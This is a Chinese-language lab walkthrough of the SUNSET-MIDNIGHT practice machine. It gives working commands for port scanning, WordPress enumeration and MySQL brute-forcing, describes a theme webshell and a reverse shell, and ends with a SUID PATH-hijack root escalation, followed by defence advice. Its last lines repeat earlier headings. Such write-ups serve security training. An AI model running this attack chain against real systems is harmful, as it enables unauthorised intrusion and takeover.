OSCP46靶场 SUNSET-MIDNIGHT 渗透测试教学文档<\/h1>

概述<\/h2>
本教学文档基于OSCP46靶场SUNSET-MIDNIGHT的渗透测试过程，详细记录了从信息收集到最终提权的完整攻击链。目标IP为172.16.33.92，涉及WordPress应用、MySQL数据库及Linux系统提权技术。<\/p>

1. 信息收集<\/h2>

1.1 端口扫描<\/h3>

使用Nmap进行全端口扫描和详细服务识别：<\/p>

ports=<\/span>$(<\/span>nmap -p- --min-rate=<\/span>1000<\/span> -T4 172.16.33.92 | grep ^[<\/span>0-9]<\/span> | cut -d '\/'<\/span> -f 1<\/span> | tr '\n'<\/span> ','<\/span> | sed s\/,$\/\/)<\/span>
<\/span><\/span>nmap -A -p$ports 172.16.33.92 > n1.txt
<\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p>

开放端口：22（SSH）、80（HTTP）、3306（MySQL）<\/li>
80端口运行WordPress应用<\/li>
扫描结果显示可能的域名，需添加hosts映射<\/li>
<\/ul>
1.2 域名映射<\/h3>
在\/etc\/hosts中添加域名映射：<\/p>
sudo vim \/etc\/hosts
<\/span><\/span># 添加：172.16.33.92 sunset-midnight<\/span>
<\/span><\/span><\/code><\/pre>1.3 WordPress枚举<\/h3>
使用WPScan枚举漏洞、插件和用户：<\/p>
wpscan --url http:\/\/sunset-midnight\/ --enumerate vp,vt,u --api-token XXXX
<\/span><\/span><\/code><\/pre>结果<\/strong>：<\/p>

发现后台管理地址<\/li>
用户admin存在（疑似管理员）<\/li>
无直接可利用漏洞<\/li>
<\/ul>
1.4 MySQL爆破<\/h3>
针对3306端口爆破MySQL root用户：<\/p>
hydra -l root -P rockyou.txt 172.16.33.92 mysql -t 16<\/span>
<\/span><\/span><\/code><\/pre>结果<\/strong>：爆破失败，但后续发现凭据为root\/robert<\/code><\/p>

2. 突破边界<\/h2>
2.1 MySQL登录<\/h3>
使用发现的凭据登录MySQL：<\/p>
mysql -h 172.16.33.92 -uroot -p --skip-ssl
<\/span><\/span># 密码：robert<\/span>
<\/span><\/span><\/code><\/pre>2.2 WordPress后台登录<\/h3>

通过MySQL修改WordPress用户密码或直接获取凭据<\/li>
登录后台：http:\/\/sunset-midnight\/wp-admin<\/li>
<\/ul>
2.3 主题文件修改<\/h3>

选择未使用的主题（如Twenty Twenty-One）<\/li>
编辑主题的404.php文件，插入WebShell代码<\/li>
激活修改后的主题<\/li>
访问触发404页面执行WebShell<\/li>
<\/ol>
关键点<\/strong>：<\/p>

直接修改当前主题文件可能失败<\/li>
通过激活新主题绕过限制<\/li>
<\/ul>
2.4 获取反向Shell<\/h3>
通过WebShell上传反弹Shell脚本或直接写入代码，获取交互式Shell。<\/p>

3. 提权至普通用户<\/h2>
3.1 配置文件发现<\/h3>
在WordPress配置文件中发现数据库凭据：<\/p>
cat \/var\/www\/html\/wordpress\/wp-config.php
<\/span><\/span><\/code><\/pre>发现<\/strong>：MySQL密码（MD5哈希形式），但可直接用于切换用户<\/p>
3.2 用户切换<\/h3>
使用发现的凭据切换用户：<\/p>
su - <username> # 输入配置文件中密码<\/span>
<\/span><\/span><\/code><\/pre>
4. 提权至Root<\/h2>
4.1 SUID文件枚举<\/h3>
查找具有SUID权限的文件：<\/p>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现可疑文件<\/strong>：\/usr\/bin\/status<\/p>
4.2 分析status程序<\/h3>
检查程序行为：<\/p>
\/usr\/bin\/status
<\/span><\/span>strings \/usr\/bin\/status
<\/span><\/span><\/code><\/pre>发现<\/strong>：程序调用system("service")，存在命令劫持可能<\/p>
4.3 环境变量劫持<\/h3>

创建恶意service文件：<\/li>
<\/ol>
echo '\/bin\/bash -p'<\/span> > \/tmp\/service
<\/span><\/span>chmod +x \/tmp\/service
<\/span><\/span><\/code><\/pre>
添加\/tmp到PATH环境变量首位：<\/li>
<\/ol>
export PATH=<\/span>\/tmp:$PATH
<\/span><\/span><\/code><\/pre>
运行status程序：<\/li>
<\/ol>
\/usr\/bin\/status
<\/span><\/span><\/code><\/pre>结果<\/strong>：以root权限启动bash shell（-p参数保留特权）<\/p>

5. 关键知识点总结<\/h2>

信息收集<\/strong>：Nmap扫描、WPScan枚举、域名映射<\/li>
服务爆破<\/strong>：MySQL默认凭据尝试<\/li>
Web突破<\/strong>：WordPress主题编辑+激活机制绕过<\/li>
权限提升<\/strong>：

配置文件敏感信息泄露<\/li>
SUID程序+PATH环境变量劫持<\/li>
<\/ul>
<\/li>
漏洞利用链<\/strong>：数据库→Web后台→文件修改→Shell→提权<\/li>
<\/ol>

6. 防御建议<\/h2>

MySQL安全<\/strong>：

禁止root远程登录<\/li>
使用强密码并定期更换<\/li>
<\/ul>
<\/li>
WordPress安全<\/strong>：

限制主题文件修改权限<\/li>
定期更新插件和主题<\/li>
<\/ul>
<\/li>
系统安全<\/strong>：

清除不必要的SUID权限<\/li>
监控环境变量修改行为<\/li>
使用最小权限原则运行服务<\/li>
<\/ul>
<\/li>
<\/ol>

附录：常用命令参考<\/h2>
# 端口扫描<\/span>
<\/span><\/span>nmap -p- --min-rate=<\/span>1000<\/span> -T4 <IP>
<\/span><\/span>
<\/span><\/span># WPScan枚举<\/span>
<\/span><\/span>wpscan --url <URL> --enumerate vp,vt,u --api-token <TOKEN>
<\/span><\/span>
<\/span><\/span># MySQL登录<\/span>
<\/span><\/span>mysql -h <IP> -u<user> -p --skip-ssl
<\/span><\/span>
<\/span><\/span># SUID查找<\/span>
<\/span><\/span>find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span>
<\/span><\/span># 环境变量劫持<\/span>
<\/span><\/span>export PATH=<\/span>\/tmp:$PATH
<\/span><\/span><\/code><\/pre>注<\/strong>：本文档仅用于教学目的，请勿用于非法测试。<\/p>

OSCP46靶场 SUNSET-MIDNIGHT 渗透测试教学文档<\/h1>

概述<\/h2> 本教学文档基于OSCP46靶场SUNSET-MIDNIGHT的渗透测试过程，详细记录了从信息收集到最终提权的完整攻击链。目标IP为172.16.33.92，涉及WordPress应用、MySQL数据库及Linux系统提权技术。<\/p>

1. 信息收集<\/h2>

2. 突破边界<\/h2>

2.4 获取反向Shell<\/h3> 通过WebShell上传反弹Shell脚本或直接写入代码，获取交互式Shell。<\/p>

3. 提权至普通用户<\/h2>

4. 提权至Root<\/h2>

概述<\/h2>
本教学文档基于OSCP46靶场SUNSET-MIDNIGHT的渗透测试过程，详细记录了从信息收集到最终提权的完整攻击链。目标IP为172.16.33.92，涉及WordPress应用、MySQL数据库及Linux系统提权技术。<\/p>

2.4 获取反向Shell<\/h3>
通过WebShell上传反弹Shell脚本或直接写入代码，获取交互式Shell。<\/p>